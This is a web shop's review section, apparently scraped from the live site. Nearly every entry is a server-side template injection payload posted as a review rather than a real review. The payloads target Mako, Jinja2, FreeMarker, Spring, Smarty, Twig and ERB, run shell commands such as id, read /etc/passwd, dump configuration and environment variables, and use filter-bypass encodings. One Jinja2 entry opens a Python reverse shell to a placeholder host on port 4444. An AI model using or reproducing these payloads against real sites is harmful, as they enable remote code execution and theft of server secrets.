• Only registered users can write reviews

Write a review

* Input elements with asterisk are required and have to be filled out.

Existing reviews (153)

human

Date:

<%= 7 * 7 %>

Was this review helpful? 0 0

human

Date:

#{3*3}

Was this review helpful? 0 0

human

Date:

#{ 7 * 7 }

Was this review helpful? 0 0

human

Date:

${self.template.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${{7*7}}

Was this review helpful? 0 0

human

Date:

@(1 2)

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

{{4*4}}[[5*5]]

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${3*3}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${{7*7}}

Was this review helpful? 0 0

human

Date:

${self.template.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

{{4*4}}[[5*5]]

Was this review helpful? 0 0

human

Date:

{{4*4}}[[5*5]]

Was this review helpful? 0 0

human

Date:

{{4*4}}[[5*5]]

Was this review helpful? 0 0

human

Date:

${self.module.runtime.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

{{self._TemplateReference__context.joiner.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

{{self._TemplateReference__context.joiner.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}

Was this review helpful? 0 0

human

Date:

{{4*4}}[[5*5]]

Was this review helpful? 0 0

human

Date:

{{self._TemplateReference__context.namespace.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

${self.template.module.filters.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${{7*7}}

Was this review helpful? 0 0

human

Date:

{{namespace.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

{{joiner.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

{{cycler.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

${self.template.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

{{self._TemplateReference__context.cycler.__init__.__globals__.os}}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template._mmarker.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.cache.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template._mmarker.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

<%= 7 * 7 %>

Was this review helpful? 0 0

human

Date:

${3*3}

Was this review helpful? 0 0

human

Date:

@(1 2)

Was this review helpful? 0 0

human

Date:

#{3*3}

Was this review helpful? 0 0

human

Date:

#{ 7 * 7 }

Was this review helpful? 0 0

human

Date:

${self.module.cache.util.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.cache.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.cache.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.traceback.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.util.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.util.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.context._with_template.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.cache.util.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.attr._NSAttr__parent.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.cache.compat.inspect.linecache.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.cache.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template._mmarker.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.util.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.cache.util.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.__init__.__globals__['os'].system('id')}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.exceptions.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.filters.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.__init__.__globals__['util'].os.system('id')}

Was this review helpful? 0 0

human

Date:

${self.module.cache.compat.inspect.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.template.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${self.module.runtime.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}

Was this review helpful? 0 0

human

Date:

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

Was this review helpful? 0 0

human

Date:

${T(java.lang.System).getenv()}

Was this review helpful? 0 0

human

Date:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Was this review helpful? 0 0

human

Date:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

Was this review helpful? 0 0

human

Date:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

Was this review helpful? 0 0

human

Date:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

Was this review helpful? 0 0

human

Date:

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

Was this review helpful? 0 0

human

Date:

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

Was this review helpful? 0 0

human

Date:

{{request.__class__}}

Was this review helpful? 0 0

human

Date:

{{request|attr("__class__")}}

Was this review helpful? 0 0

human

Date:

{{request|attr(["__","class","__"]|join)}}

Was this review helpful? 0 0

human

Date:

{{request|attr(["_"*2,"class","_"*2]|join)}}

Was this review helpful? 0 0

human

Date:

{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}

Was this review helpful? 0 0

human

Date:

{{['cat$IFS/etc/passwd']|filter('system')}}

Was this review helpful? 0 0

human

Date:

{{['cat\x20/etc/passwd']|filter('system')}}

Was this review helpful? 0 0

human

Date:

{{['id']|filter('system')}}

Was this review helpful? 0 0

human

Date:

{php}echo `id`;{/php}

Was this review helpful? 0 0

human

Date:

{$smarty.version}

Was this review helpful? 0 0

human

Date:

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

Was this review helpful? 0 0

human

Date:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}

Was this review helpful? 0 0

human

Date:

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}

Was this review helpful? 0 0

human

Date:

{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

Was this review helpful? 0 0

human

Date:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

Was this review helpful? 0 0

human

Date:

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

Was this review helpful? 0 0

human

Date:

${"freemarker.template.utility.Execute"?new()("id")}

Was this review helpful? 0 0

human

Date:

[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}

Was this review helpful? 0 0

human

Date:

{{7*'7'}}

Was this review helpful? 0 0

human

Date:

<%= File.open('/etc/passwd').read %>

Was this review helpful? 0 0

human

Date:

{{self}}

Was this review helpful? 0 0

human

Date:

{{ request }}

Was this review helpful? 0 0

human

Date:

{{'a'.toUpperCase()}}

Was this review helpful? 0 0

human

Date:

{% for key, value in config.iteritems() %}

{{ key|e }}
{{ value|e }}
{% endfor %}

Was this review helpful? 0 0

human

Date:

{{ ''.__class__.__mro__[2].__subclasses__() }}

Was this review helpful? 0 0

human

Date:

{{''.class.mro()[1].subclasses()}}

Was this review helpful? 0 0

human

Date:

{{ [].class.base.subclasses() }}

Was this review helpful? 0 0

human

Date:

{{config.items()}}

Was this review helpful? 0 0

human

Date:

{{app.request.server.all|join(',')}}

Was this review helpful? 0 0

human

Date:

{{dump(app)}}

Was this review helpful? 0 0

human

Date:

{{7*7}}

Was this review helpful? 0 0

human

Date:

<%= 7*7 %>

Was this review helpful? 0 0

human

Date:

<%= "foo" %>

Was this review helpful? 0 0

human

Date:

human

Was this review helpful? 0 0

human

Date:

human

Was this review helpful? 0 0

hello

Date:

good

Was this review helpful? 0 0
Live Chat